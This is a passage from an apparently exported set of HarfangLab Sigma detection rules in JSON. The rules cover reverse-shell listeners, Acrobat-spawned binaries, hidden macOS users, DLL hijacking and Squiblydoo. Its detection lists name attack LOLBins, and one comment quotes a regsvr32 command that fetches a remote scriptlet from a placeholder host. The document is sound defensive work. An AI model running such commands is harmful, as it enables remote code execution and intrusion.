/tmp/go-build1480910053/b001/logsevents.test\n # /tmp/go-build3216331136/b001/schedulerd.test\n Image|startswith: '/tmp/go-build*/????/'\n\n exclusion_plz_sandbox:\n ProcessImage|startswith: '/tmp/plz_sandbox/'\n\n exclusion_opcon:\n ProcessImage|startswith: '/tmp/opcon_agent/bin/'\n\n exclusion_jetbrains:\n ProcessImage: '/tmp/.mount_*/jetbrains-toolbox'\n\n exclusion_veeam:\n ProcessImage:\n - '/tmp/VeeamAgent*/veeamagent'\n - '/var/tmp/veeamagent*/veeamagent'\n\n exclusion_collabora_appimage:\n ProcessImage: '/tmp/appimage_extracted_*/usr/bin/coolwsd'\n\n exclusion_veeam_plugin_manager:\n ProcessParentImage: '/opt/veeam/VeeamPluginforOracleRMAN/RMANPluginManager'\n\n exclusion_ossec_ids:\n - ProcessImage:\n - '/var/ossec/bin/wazuh-remoted'\n - '/var/ossec/bin/wazuh-authd'\n - ProcessCommandLine: '/var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh_apid.py'\n\n exclusion_nexcloud:\n ProcessImage: '/var/www/html/nextcloud/*/apps/notify_push/bin/x86_64/notify_push'\n\n exclusion_oracle:\n ProcessImage: '/tmp/CVU_*_resource/exectask'\n\n exclusion_vscode:\n ProcessImage: '/root/.vscode-server/bin/*/node'\n\n exclusion_k3s:\n ProcessImage|endswith: '/k3s/data/*/bin/k3s'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "08f3ae91-3811-4a4b-8f04-87302ca365c9",
+ "rule_name": "Process Started Listening for Incoming Connections from Suspicious Path",
+ "rule_description": "Detects a process that starts listening for incoming connections from a suspicious path.\nAttackers may setup reverse shells listening for incoming connections as a persistence and C2 mechanism.\nIt is recommended to ensure the process had legitimate reason to do so and that the host wasn't compromised.\n",
+ "rule_creation_date": "2023-12-15",
+ "rule_modified_date": "2026-02-27",
+ "rule_os": "linux",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.command_and_control",
+ "attack.defense_evasion",
+ "attack.persistence"
+ ],
+ "rule_technique_tags": [
+ "attack.t1104",
+ "attack.t1205.001",
+ "attack.t1571"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "08f5486f-0238-406f-a789-aad56def2bd3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.626532Z",
+ "creation_date": "2026-03-23T11:45:34.626534Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.626538Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://hacksys.io/blogs/adobe-reader-resetform-cagg-rce-cve-2023-21608",
+ "https://attack.mitre.org/techniques/T1566/",
+ "https://attack.mitre.org/techniques/T1203/",
+ "https://attack.mitre.org/techniques/T1204/002/"
+ ],
+ "name": "t1104_acrobat_spawning_malicious_process.yml",
+ "content": "title: Suspicious Process Started by Acrobat Reader\nid: 08f5486f-0238-406f-a789-aad56def2bd3\ndescription: |\n Detects the suspicious execution of binaries by Adobe Acrobat Reader.\n Adversaries can use phishing techniques to send malicious PDF files that exploit vulnerabilities in Adobe Acrobat Reader, or contain malicious script as an initial access vector.\n For example, the CVE-2023-21608 is known to make Adobe Acrobat execute arbitrary code when a user opens a malicious PDF file.\n It is recommended to check the origin of the PDF file and the legitimacy of the executed binary.\nreferences:\n - https://hacksys.io/blogs/adobe-reader-resetform-cagg-rce-cve-2023-21608\n - https://attack.mitre.org/techniques/T1566/\n - https://attack.mitre.org/techniques/T1203/\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2023/01/31\nmodified: 2026/01/12\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566\n - attack.execution\n - attack.t1203\n - attack.t1204.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_acrobat:\n ParentImage|endswith:\n - '\\Acrobat.exe'\n - '\\AcroRd32.exe'\n - '\\Acrobat_sl.exe'\n - '\\AcroCEF.exe'\n\n selection_bin:\n OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 'cscript.exe'\n - 'wscript.exe'\n - 'schtasks.exe'\n - 'REGSVR32.EXE'\n - 'wmic.exe' # use wmic to spawn PowerShell or else under wmiprvse or squiblytwo\n - 'MSHTA.EXE'\n - 'RUNDLL32.EXE'\n - 'msiexec.exe'\n - 'MSBuild.exe' # https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n - 'appvlp.exe' # lolbas : https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\n - 'extrac32.exe' # https://twitter.com/ShadowChasing1/status/1557287930267578368\n - 'calc.exe' # For POCs\n\n exclusion_msiexec_adobe:\n CommandLine|contains:\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1036-1033-7760-BC15014EA700} CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /qn\n # C:\\WINDOWS\\system32\\msiexec.exe /I {AC76BA86-1036-1033-7760-BC15014EA700} REINSTALL=ALL REINSTALLMODE=omus /qb\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1036-1033-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FFFF-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FF00-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FFFF-7760-BC15014EA700} REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-7AD7-1036-7B44-AC0F074E4100} CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /qn\n # C:\\Windows\\System32\\msiexec.exe /i {AC76BA86-1033-FFFF-7760-0C0F074E4100} CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /qn\n # msiexec.exe /I {AC76BA86-1033-F400-BA7E-000000000004} ADDLOCAL=ChineseSLanguageSupport /qb\n # C:\\WINDOWS\\system32\\msiexec.exe /I {AC76BA86-1033-FFFF-7760-000000000006} REINSTALL=ALL REINSTALLMODE=omus /qb\n - 'msiexec.exe /i {AC76BA86-????-????-????-????????????} '\n - 'msiexec.exe /i {AC76BA86-????-????-????-????????????} ' # The two spaces are intentional\n - 'msiexec.exe /fmous {AC76BA86-????-????-????-????????????} '\n OriginalFileName: 'msiexec.exe'\n\n exclusion_spool:\n CommandLine|startswith:\n # rundll32 C:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\hpmsn140.DLL,MonitorPrintJobStatus *\n # rundll32 C:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\hpmsn175.dll,MonitorPrintJobStatus *\n - 'rundll32 ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n - 'rundll32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n # regsvr32 /s /n /i C:\\Windows\\system32\\spool\\DRIVERS\\W32X86\\3\\UDCOfficeAddin2000.dll\n - 'regsvr32 /s /n /i ?:\\Windows\\system32\\spool\\DRIVERS\\'\n - 'regsvr32 /s /n /i:OnPrinterAccess ?:\\WINDOWS\\system32\\spool\\DRIVERS\\'\n\n exclusion_rundll32:\n CommandLine|startswith:\n - '?:\\WINDOWS\\system32\\rundll32.exe ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile'\n - '?:\\WINDOWS\\SysWOW64\\rundll32.exe ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\cryptext.dll,CryptExtAddCERMachineOnlyAndHwnd MIIGq'\n - '?:\\WINDOWS\\System32\\RunDll32.exe ?:\\WINDOWS\\system32\\hotplug.dll,HotPlugSafeRemovalDriveNotification '\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\eed_ec.dll,SpeedLauncher'\n - '?:\\WINDOWS\\System32\\rundll32.exe ?:\\Program Files (x86)\\Windows Photo Viewer\\PhotoViewer.dll, ImageView_Fullscreen '\n - '?:\\Windows\\System32\\rundll32.exe ?:\\WINDOWS\\System32\\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding'\n - '?:\\Windows\\SysWOW64\\rundll32.exe ?:\\WINDOWS\\System32\\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding'\n - '?:\\Windows\\System32\\rundll32.exe shwebsvc.dll,AddNetPlaceRunDll'\n\n exclusion_mailprotocolhandler:\n CommandLine|contains: 'rundll32.exe *,MailToProtocolHandler mailto:'\n\n exclusion_open_adobe_website:\n CommandLine|contains:\n - 'start microsoft-edge:http://www.adobe.com/'\n - 'start microsoft-edge:http://acrobat.adobe.com/'\n - 'start microsoft-edge:https://www.adobe.com/'\n - 'start microsoft-edge:https://acrobat.adobe.com/'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "08f5486f-0238-406f-a789-aad56def2bd3",
+ "rule_name": "Suspicious Process Started by Acrobat Reader",
+ "rule_description": "Detects the suspicious execution of binaries by Adobe Acrobat Reader.\nAdversaries can use phishing techniques to send malicious PDF files that exploit vulnerabilities in Adobe Acrobat Reader, or contain malicious script as an initial access vector.\nFor example, the CVE-2023-21608 is known to make Adobe Acrobat execute arbitrary code when a user opens a malicious PDF file.\nIt is recommended to check the origin of the PDF file and the legitimacy of the executed binary.\n",
+ "rule_creation_date": "2023-01-31",
+ "rule_modified_date": "2026-01-12",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.execution",
+ "attack.initial_access"
+ ],
+ "rule_technique_tags": [
+ "attack.t1203",
+ "attack.t1204.002",
+ "attack.t1566"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0915b4a3-17da-4c9c-bf08-1db96769b345",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.625928Z",
+ "creation_date": "2026-03-23T11:45:34.625930Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.625934Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md",
+ "https://attack.mitre.org/techniques/T1564/002/"
+ ],
+ "name": "t1564_002_create_hidden_user_macos.yml",
+ "content": "title: Hidden User Created\nid: 0915b4a3-17da-4c9c-bf08-1db96769b345\ndescription: |\n Detects a suspicious attempt at creating a hidden user.\n Adversaries may use hidden users to hide the presence of user accounts they create or modify.\n It is recommended to check it the created account is expected to be created.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md\n - https://attack.mitre.org/techniques/T1564/002/\ndate: 2022/08/25\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscl\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.AccountManipulation\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base_dscl:\n Image: '/usr/bin/dscl'\n User: 'root'\n CommandLine|contains:\n - ' create'\n - ' -create'\n ParentImage|contains: '?'\n\n selection_specific_dscl_low_id_hidden1:\n # ID < 500 are considered hidden by default on *OS\n #CommandLine|re:\n # - '.*UniqueID *[0-4]?[0-9]?[0-9]( |$).*'\n CommandLine|contains:\n - 'UniqueID ? '\n - 'UniqueID ?? '\n - 'UniqueID 1?? '\n - 'UniqueID 2?? '\n - 'UniqueID 3?? '\n - 'UniqueID 4?? '\n\n selection_specific_dscl_low_id_hidden2:\n # ID < 500 are considered hidden by default on *OS\n CommandLine|endswith:\n - 'UniqueID ?'\n - 'UniqueID ??'\n - 'UniqueID 1??'\n - 'UniqueID 2??'\n - 'UniqueID 3??'\n - 'UniqueID 4??'\n\n selection_specific_dscl_hidden_parameter:\n #CommandLine|re: '.*IsHidden *1.*'\n CommandLine|contains:\n - 'IsHidden *1'\n - 'IsHidden *true'\n\n selection_base_sysadminctl:\n Image: '/usr/sbin/sysadminctl'\n User: 'root'\n CommandLine|contains: ' -addUser'\n ParentImage|contains: '?'\n\n selection_specific_sysadminctl_low_id_hidden1:\n # ID < 500 are considered hidden by default on *OS\n #CommandLine|re:\n # - '.*-UID *[0-4]?[0-9]?[0-9]( |$).*'\n CommandLine|contains:\n - '-UID ? '\n - '-UID ?? '\n - '-UID 1?? '\n - '-UID 2?? '\n - '-UID 3?? '\n - '-UID 4?? '\n\n selection_specific_sysadminctl_low_id_hidden2:\n # ID < 500 are considered hidden by default on *OS\n CommandLine|endswith:\n - '-UID ?'\n - '-UID ??'\n - '-UID 1??'\n - '-UID 2??'\n - '-UID 3??'\n - '-UID 4??'\n\n exclusion_jamf:\n # /usr/bin/dscl localhost -create /Local/Default/Users/mngt-admin IsHidden 1\n # parent:\n # /usr/local/jamf/bin/jamf postMdmEnrollment -server_url https://xxxx.jamfcloud.com -invitation yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\n # jamf enroll -invitation yyyyyyyyyyyyyyyyyyyyyyyyyyy -noPolicy\n - ProcessParentImage: '/usr/local/jamf/bin/jamf'\n - ProcessAncestors|contains: '|/usr/local/jamf/bin/jamf'\n\n exclusion_known_users:\n ProcessCommandLine|contains:\n - '/usr/bin/dscl . -create users/_fsvpn_' # fsecure\n - 'create /users/_nixbld' # nix\n - 'dscl . create /users/eset-ecsm-' # eset\n\n exclusion_windscribe:\n ProcessParentImage: '/Library/PrivilegedHelperTools/com.windscribe.helper.macos'\n\n exclusion_installer:\n - ProcessParentCommandLine|startswith: '/bin/bash /tmp/PKInstallSandbox.??????/Scripts/'\n - ProcessGrandparentCommandLine|startswith: '/bin/bash /tmp/PKInstallSandbox.??????/Scripts/'\n\n exclusion_intune:\n ProcessGrandparentImage: '/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon'\n\n condition: ((selection_base_dscl and 1 of selection_specific_dscl_*) or (selection_base_sysadminctl and 1 of selection_specific_sysadminctl_*)) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "0915b4a3-17da-4c9c-bf08-1db96769b345",
+ "rule_name": "Hidden User Created",
+ "rule_description": "Detects a suspicious attempt at creating a hidden user.\nAdversaries may use hidden users to hide the presence of user accounts they create or modify.\nIt is recommended to check it the created account is expected to be created.\n",
+ "rule_creation_date": "2022-08-25",
+ "rule_modified_date": "2025-12-29",
+ "rule_os": "macos",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1564.002"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "096b4462-7384-4447-95a6-a2c2c26ffcb0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.096369Z",
+ "creation_date": "2026-03-23T11:45:34.096371Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.096375Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia",
+ "https://securelist.com/common-ttps-of-attacks-against-industrial-organizations/110319/",
+ "https://twitter.com/malwrhunterteam/status/1558149472672251904",
+ "https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_mcods.yml",
+ "content": "title: DLL Hijacking via McOds.exe\nid: 096b4462-7384-4447-95a6-a2c2c26ffcb0\ndescription: |\n Detects potential Windows DLL Hijacking via McOds.exe related to McAfee VirusScan.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia\n - https://securelist.com/common-ttps-of-attacks-against-industrial-organizations/110319/\n - https://twitter.com/malwrhunterteam/status/1558149472672251904\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'McOds.exe'\n ImageLoaded|endswith: '\\McVsoCfg.dll'\n\n filter_legitimate_image:\n Image|startswith: '?:\\Program Files\\McAfee\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\McAfee\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'McAfee, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "096b4462-7384-4447-95a6-a2c2c26ffcb0",
+ "rule_name": "DLL Hijacking via McOds.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via McOds.exe related to McAfee VirusScan.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2024-03-20",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "09718066-8257-4dd4-83e0-14787bbc9fd3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.615428Z",
+ "creation_date": "2026-03-23T11:45:34.615432Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.615439Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://car.mitre.org/analytics/CAR-2019-04-003/",
+ "https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo",
+ "https://github.com/cobbr/Covenant",
+ "https://attack.mitre.org/techniques/T1218/010/",
+ "https://lolbas-project.github.io/lolbas/Libraries/Scrobj/",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"
+ ],
+ "name": "t1218_010_squiblydoo.yml",
+ "content": "title: Possible Squiblydoo Attack Detected\nid: 09718066-8257-4dd4-83e0-14787bbc9fd3\ndescription: |\n Detects a suspicious invocation of `scrobj.dll` by `regsvr32.exe` (both lolbins), a technique also known as Squiblydoo.\n Attackers can used this technique to proxy execution of malicious code.\n This can be a sign of Covenant Regsvr32 launcher exploitation.\n Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\n It is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the regsvr32 process.\nreferences:\n - https://car.mitre.org/analytics/CAR-2019-04-003/\n - https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo\n - https://github.com/cobbr/Covenant\n - https://attack.mitre.org/techniques/T1218/010/\n - https://lolbas-project.github.io/lolbas/Libraries/Scrobj/\n - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\ndate: 2021/02/10\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.010\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Scrobj\n - classification.Windows.LOLBin.Regsvr32\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # regsvr32 /s /u /n /i:http://xxx.xxx.xxxx.xxx:9998/19jSi scrobj\n selection_1:\n - Image|endswith: '\\regsvr32.exe'\n - OriginalFileName: 'REGSVR32.EXE'\n selection_2:\n CommandLine|contains: 'scrobj'\n\n exclusion_scrobj:\n CommandLine:\n - '?:\\windows\\system32\\regsvr32.exe ?:\\windows\\system32\\scrobj.dll /s'\n - '?:\\WINDOWS\\SysWoW64\\regsvr32.exe ?:\\WINDOWS\\SysWoW64\\scrobj.dll /s'\n - 'regsvr32.exe /s ?:\\Windows??system32\\scrobj.dll'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "09718066-8257-4dd4-83e0-14787bbc9fd3",
+ "rule_name": "Possible Squiblydoo Attack Detected",
+ "rule_description": "Detects a suspicious invocation of `scrobj.dll` by `regsvr32.exe` (both lolbins), a technique also known as Squiblydoo.\nAttackers can used this technique to proxy execution of malicious code.\nThis can be a sign of Covenant Regsvr32 launcher exploitation.\nCovenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\nIt is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the regsvr32 process.\n",
+ "rule_creation_date": "2021-02-10",
+ "rule_modified_date": "2025-04-14",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1218.010"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "098502c3-27e1-4c6f-a53e-8fa8f3dd549f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.594813Z",
+ "creation_date": "2026-03-23T11:45:34.594816Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.594824Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_pcalua.yml",
+ "content": "title: DLL Hijacking via pcalua.exe\nid: 098502c3-27e1-4c6f-a53e-8fa8f3dd549f\ndescription: |\n Detects potential Windows DLL Hijacking via pcalua.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pcalua.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\pcaui.dll'\n - '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 